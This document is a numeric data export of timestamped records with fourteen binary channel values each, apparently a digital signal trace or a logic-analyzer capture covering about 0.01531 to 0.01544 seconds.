0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5305852e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5305876e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5305900e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5305924e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5305948e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5305972e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5306004e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5306052e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5306076e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5306084e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5306100e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5306124e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5306148e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5306172e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5306200e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5306228e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5306252e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5306276e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5306300e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5306324e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5306348e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5306372e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5306380e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5306428e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5306452e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,1.5306456e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5306460e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5306476e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5306500e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5306524e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5306548e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5306572e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5306600e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5306652e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5306676e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5306700e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5306724e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5306776e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5306800e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5306852e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5306876e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5306924e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5306948e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5306972e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5307000e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5307024e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5307052e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5307100e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5307124e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5307132e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5307148e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5307172e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5307200e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5307224e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5307252e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5307276e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5307324e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5307348e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5307372e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5307400e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5307424e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5307452e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5307476e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5307500e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5307524e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5307548e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5307572e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5307600e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5307652e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5307676e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5307680e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5307700e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5307724e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5307732e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5307748e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5307772e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5307800e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5307824e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5307876e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5307900e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5307924e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5307948e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5308000e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5308024e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5308076e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5308100e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5308148e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5308172e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5308200e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5308224e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5308252e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5308276e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5308300e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5308324e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5308348e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5308372e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5308400e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5308424e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5308452e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5308476e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5308500e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5308524e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5308548e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5308572e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5308600e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5308624e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5308652e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5308676e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5308700e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5308724e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5308748e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5308772e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5308800e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5308824e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5308852e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5308876e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5308900e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5308924e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5308952e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5308980e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5309004e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5309028e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5309052e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5309076e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.5433248e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,1.5433420e-02 1,0,1,0,0,0,0,0,0,0,0,1,0,1,1.5433448e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,1.5433472e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,1.5433772e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,1.5433796e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,1.5433820e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,1.5433844e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,1.5433896e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,1.5433920e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,1,1.5433924e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,1,1.5433972e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,1,1.5433996e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,1.5434004e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,1,1.5434044e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,1.5434068e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5434080e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5434096e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5434120e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5434144e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5434172e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5434220e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5434244e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5434252e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5434296e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5434320e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5434324e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5434344e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5434372e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5434396e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5434420e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5434444e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5434468e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5434476e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5434520e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5434548e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5434572e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5434596e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5434600e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5434644e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5434668e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5434676e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5434692e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5434720e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5434744e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5434772e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5434796e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5434820e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5434844e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5434868e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5434892e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5434920e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5434944e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5434972e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5434996e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5435020e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5435044e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5435068e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5435120e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5435144e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5435148e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5435196e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5435220e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5435228e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5435268e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5435296e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5435320e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5435344e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5435372e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5435396e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5435420e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5435444e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5435468e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5435492e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5435520e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5435544e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5435572e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5435596e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5435620e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5435644e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5435668e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5435692e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5435720e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5435744e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5435772e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5435796e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5435800e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5435844e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5435868e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5435876e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5435892e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5435920e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5435944e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5435972e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5435996e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5436020e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5436024e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5436068e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5436096e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5436100e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5436120e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5436144e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5436196e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5436220e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,0,1.5436224e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5436228e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5436244e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5436268e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5436276e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5436292e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5436320e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5436344e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5436372e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5436420e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5436444e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5436452e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5436468e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5436492e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5436520e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5436544e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5436596e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5436620e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,0,1.5436624e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5436628e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5436644e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5436668e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5436692e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5436720e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5436744e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5436768e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5436796e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5436820e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5436828e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5436868e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5436892e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5436920e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5436940e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5436968e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5436992e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5437020e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5437044e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5437068e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5437092e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5437120e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5437140e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5437168e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5437192e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5437220e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5437252e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5437276e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5437300e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5437304e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5437348e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5437372e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5437380e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5437428e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,0,1.5437452e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5437456e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5437476e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5437500e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5437524e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5437548e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5437572e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5437600e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5437604e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5437652e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5437676e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5437700e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5437724e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5437748e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5437772e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5437800e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5437824e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5437852e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,0,1.5437876e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5437880e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5437924e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5437948e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5437956e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5437972e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5438000e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5438024e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5438052e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5438076e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5438100e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5438124e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5438152e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5438180e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5438208e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5438232e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5438260e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5438308e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5438332e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5438340e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5438356e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5438380e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5438404e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5438432e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5438452e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5438480e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5438484e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5438532e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5438556e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5438564e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5438604e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5438632e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5438636e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5438656e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5438680e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5438704e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5438732e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5438756e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5438780e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5438788e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5438832e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5438856e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5438880e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5438904e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5438908e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5438956e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5438980e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5438988e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5439004e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5439032e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5439052e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5439080e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5439132e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5439156e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5439164e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5439180e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5439204e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5439212e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5439228e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5439252e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5439280e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5439304e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5439332e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5439356e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5439380e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5439404e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5439456e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5439480e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5439484e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5439532e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5439556e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5439564e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5439604e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5439628e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5439652e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5439680e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5439704e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5439732e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5439780e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5439804e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5439812e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5439856e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5439880e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5439884e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5439904e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5439932e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5439956e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5439980e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.5440004e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.5440028e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5440036e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5440080e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5440108e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5440132e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5440156e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5440180e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5440204e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5440232e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5440252e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5440280e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5440304e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5440332e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5440356e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5440380e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5440404e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5440432e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5440452e-02 